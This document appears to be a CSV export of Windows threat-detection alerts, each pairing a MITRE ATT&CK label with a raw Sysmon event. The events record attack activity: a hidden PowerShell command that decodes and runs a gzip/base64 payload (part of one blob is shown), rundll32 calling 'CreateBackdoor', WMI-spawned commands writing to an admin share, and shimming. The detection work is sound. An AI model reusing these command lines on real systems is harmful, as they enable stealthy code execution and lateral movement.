RPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.
CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:26:52.356089Z"">
</TimeCreated>
<EventRecordID>9809</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:26:52.356</Data>
<Data Name=""ProcessGuid"">365ABB72-AF8C-5CC8-0000-001003361900</Data>
<Data Name=""ProcessId"">2484</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;powershell.exe&quot; -noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;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&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AF8B-5CC8-0000-0010AC1B1900</Data>
<Data Name=""ParentProcessId"">3872</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;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&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1594332367.487274,2020-07-10T02:06:07.487274+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-09T22:05:58.373961Z"">
</TimeCreated>
<EventRecordID>311382</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3148"" ThreadID=""4088"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-07-09 22:05:55.880</Data>
<Data Name=""ProcessGuid"">747F3D96-94C3-5F07-0000-001080B40100</Data>
<Data Name=""ProcessId"">3096</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-1350-5F08-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">628</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1115] Clipboard Data Collection,1594376435.589722,2020-07-10T14:20:35.589722+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rdpclip.exe ) through command line ( rdpclip ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-10T10:20:34.910334Z"">
</TimeCreated>
<EventRecordID>311396</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3148"" ThreadID=""4088"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-07-10 10:20:34.877</Data>
<Data Name=""ProcessGuid"">747F3D96-40F2-5F08-0000-0010D8A92C00</Data>
<Data Name=""ProcessId"">3304</Data>
<Data Name=""Image"">C:\Windows\System32\rdpclip.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1131 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">RDP Clipboard Monitor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">rdpclip.exe</Data>
<Data Name=""CommandLine"">rdpclip</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-94CD-5F07-0000-0020ABBF0300</Data>
<Data Name=""LogonId"">0x3bfab</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=0265C1718EC95B025D9719F3B4872826F8F4661F,MD5=9E089ECF8B86983B7A77E3844CD02BB5,SHA256=AF5CAE4B514215E530643A7FEA2D7A47A1B15F6E5610347B217D1ABFA4AE0F92,IMPHASH=E3F33CEBF67721DAC951AFBD20321206</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1350-5F08-0000-001014C50000</Data>
<Data Name=""ParentProcessId"">824</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\System32\svchost.exe -k NetworkService -s TermService</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.459240Z"">
</TimeCreated>
<EventRecordID>243558</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.452</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001035972000</Data>
<Data Name=""ProcessId"">1388</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028568.168278,2019-03-20T00:49:28.168278+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:49:28.158264Z"">
</TimeCreated>
<EventRecordID>1966403</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:49:28.058</Data>
<Data Name=""ProcessGuid"">365ABB72-55D8-5C91-0000-001060C90700</Data>
<Data Name=""ProcessId"">3648</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;powershell.exe&quot; -noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;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&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:26:52.356089Z"">
</TimeCreated>
<EventRecordID>9809</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:26:52.356</Data>
<Data Name=""ProcessGuid"">365ABB72-AF8C-5CC8-0000-001003361900</Data>
<Data Name=""ProcessId"">2484</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;powershell.exe&quot; -noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;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&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AF8B-5CC8-0000-0010AC1B1900</Data>
<Data Name=""ParentProcessId"">3872</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;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&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.683059,2019-07-30T01:33:58.683059+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:58.598592Z"">
</TimeCreated>
<EventRecordID>4949</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:58.357</Data>
<Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-0010A7398B00</Data>
<Data Name=""ProcessId"">3868</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,Low,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.777453Z"">
</TimeCreated>
<EventRecordID>421227</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.776</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001088C23300</Data>
<Data Name=""ProcessId"">2784</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) ran process C:\Windows\System32\mshta.exe and initiated a network connection from hostname ( IEWIN7 ) and IP ( 10.0.2.16 ) to hostname ( ) , IP ( 10.0.2.17 ) and port ( 55683 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T01:29:05.534521Z"">
</TimeCreated>
<EventRecordID>17590</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2000"" ThreadID=""1980"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 01:29:00.318</Data>
<Data Name=""ProcessGuid"">365ABB72-19E0-5CDA-0000-001006711000</Data>
<Data Name=""ProcessId"">1932</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">false</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.16</Data>
<Data Name=""SourceHostname"">IEWIN7</Data>
<Data Name=""SourcePort"">49168</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.0.2.17</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">55683</Data>
<Data Name=""DestinationPortName""></Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.777453Z"">
</TimeCreated>
<EventRecordID>421227</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.776</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001088C23300</Data>
<Data Name=""ProcessId"">2784</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
